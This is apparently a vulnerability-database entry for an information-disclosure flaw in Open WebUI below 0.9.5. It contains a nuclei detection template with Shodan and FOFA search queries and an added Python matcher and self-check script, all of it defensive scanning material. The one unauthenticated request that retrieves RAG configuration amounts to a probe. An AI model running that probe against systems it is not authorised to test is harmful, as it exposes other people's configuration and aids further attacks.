Open WebUI < 0.9.5 - Information Disclosure

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Open WebUI below 0.9.5 discloses RAG configuration via unauthenticated GET /api/v1/retrieval/.

Nuclei template:
id: CVE-2026-45397

info:
  name: Open WebUI < 0.9.5 - Information Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    Open WebUI < 0.9.5 contains an information disclosure vulnerability caused by unauthenticated access to the GET /api/v1/retrieval/ endpoint, letting remote attackers retrieve the live RAG pipeline configuration without authorization. Exploitation requires no authentication.
  impact: |
    Remote attackers can access sensitive configuration data without authentication, potentially aiding further attacks.
  remediation: |
    Update to version 0.9.5 or later.
  reference:
    - https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg
    - https://github.com/open-webui/open-webui
    - https://nvd.nist.gov/vuln/detail/CVE-2026-45397
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-862
    cve-id: CVE-2026-45397
    epss-score: 0.0072
    epss-percentile: 0.4935
  metadata:
    verified: true
    max-request: 1
    vendor: openwebui
    product: open-webui
    shodan-query: title:"Open WebUI"
    fofa-query: title="Open WebUI"
  tags: cve,cve2026,open-webui,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/retrieval/"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "CHUNK_SIZE", "RAG_EMBEDDING_MODEL", "RAG_TEMPLATE")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100db7d9b00b3f15511bdbedca18a48c0b829817c4284535bb0ef63b73d168192fa02201095c050405419675d8a0114662722b667278fa600e8f549a409b2dd1bb9bca3:922c64590222798bb761d5b6d8e72950
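The template above reduces to three matchers joined with `condition: and`: the response status must be 200, the Content-Type must contain `application/json`, and the body must contain all three configuration keys. The following Python script is an added example (not part of the Vulners page or the ProjectDiscovery template) that re-implements that matcher logic so a defender can reason about it offline against constructed responses, and that wraps the same single GET request as a `check_instance` helper for verifying one's own deployment after updating. The sample responses, the `HttpResponse` dataclass and the function names are assumptions constructed for this example; the three key names, the path and the matcher conditions come from the template.

```python
"""Offline re-implementation of the nuclei matchers for CVE-2026-45397.

Added example: mirrors the template's dsl matchers (status 200, JSON
content type, all three RAG config keys in the body) and never prints
the configuration body itself, only the verdict and which keys appeared.
"""
import json
import urllib.error
import urllib.request
from dataclasses import dataclass

# Key names taken from the template's contains_all(...) matcher.
REQUIRED_KEYS = ("CHUNK_SIZE", "RAG_EMBEDDING_MODEL", "RAG_TEMPLATE")
ENDPOINT = "/api/v1/retrieval/"


@dataclass
class HttpResponse:
    """Minimal response container (assumed for this example)."""
    status_code: int
    content_type: str
    body: str


def matches_template(resp: HttpResponse) -> bool:
    """True iff all three matchers from the nuclei template hold (condition: and)."""
    return (
        resp.status_code == 200
        and "application/json" in resp.content_type
        and all(key in resp.body for key in REQUIRED_KEYS)
    )


def exposed_keys(resp: HttpResponse) -> list:
    """Return which sensitive keys are present as top-level JSON fields.

    Stricter than the template's substring check: a login page that merely
    mentions the key names in HTML or JavaScript is not counted.
    """
    try:
        data = json.loads(resp.body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, dict):
        return []
    return sorted(key for key in REQUIRED_KEYS if key in data)


def check_instance(base_url: str, timeout: float = 10.0):
    """Issue the template's single unauthenticated GET against your own
    deployment and return (matches_template, exposed_keys) without echoing
    the configuration body.
    """
    url = base_url.rstrip("/") + ENDPOINT
    req = urllib.request.Request(url, headers={"User-Agent": "rag-config-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            resp = HttpResponse(r.status, r.headers.get("Content-Type", ""),
                                r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        # A patched instance answers 401/403 here; HTTPError carries the status.
        resp = HttpResponse(e.code, e.headers.get("Content-Type", ""),
                            e.read().decode("utf-8", "replace"))
    return matches_template(resp), exposed_keys(resp)


# Constructed sample responses (not captured from any real instance).
VULNERABLE = HttpResponse(
    200, "application/json",
    json.dumps({"status": True, "CHUNK_SIZE": 1000, "CHUNK_OVERLAP": 100,
                "RAG_EMBEDDING_MODEL": "example-embedding-model",
                "RAG_TEMPLATE": "Use the following context: [context]"}),
)
PATCHED = HttpResponse(
    401, "application/json", json.dumps({"detail": "Not authenticated"}),
)
# An HTML page that happens to contain the key names in its bundled JS:
# the content_type matcher is what keeps this from being a false positive.
HTML_LOGIN = HttpResponse(
    200, "text/html; charset=utf-8",
    "<html><script>var f=['CHUNK_SIZE','RAG_EMBEDDING_MODEL','RAG_TEMPLATE'];</script></html>",
)

if __name__ == "__main__":
    for label, sample in (("vulnerable", VULNERABLE), ("patched", PATCHED), ("html", HTML_LOGIN)):
        print(f"{label}: match={matches_template(sample)} keys={exposed_keys(sample)}")
```

The `HTML_LOGIN` sample shows why the template checks `content_type` in addition to the key names: a single-page front end can ship those identifiers inside its JavaScript bundle, so a body-only match would flag fully patched instances. After updating to 0.9.5 or later, `check_instance("https://your-open-webui.example")` should return `(False, [])`.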


Scores (current as of 01 Jun 2026 01:19):
Vulners AI Score: 6.1 (medium risk)
CVSS 3.1: 5.3
EPSS: 0.0072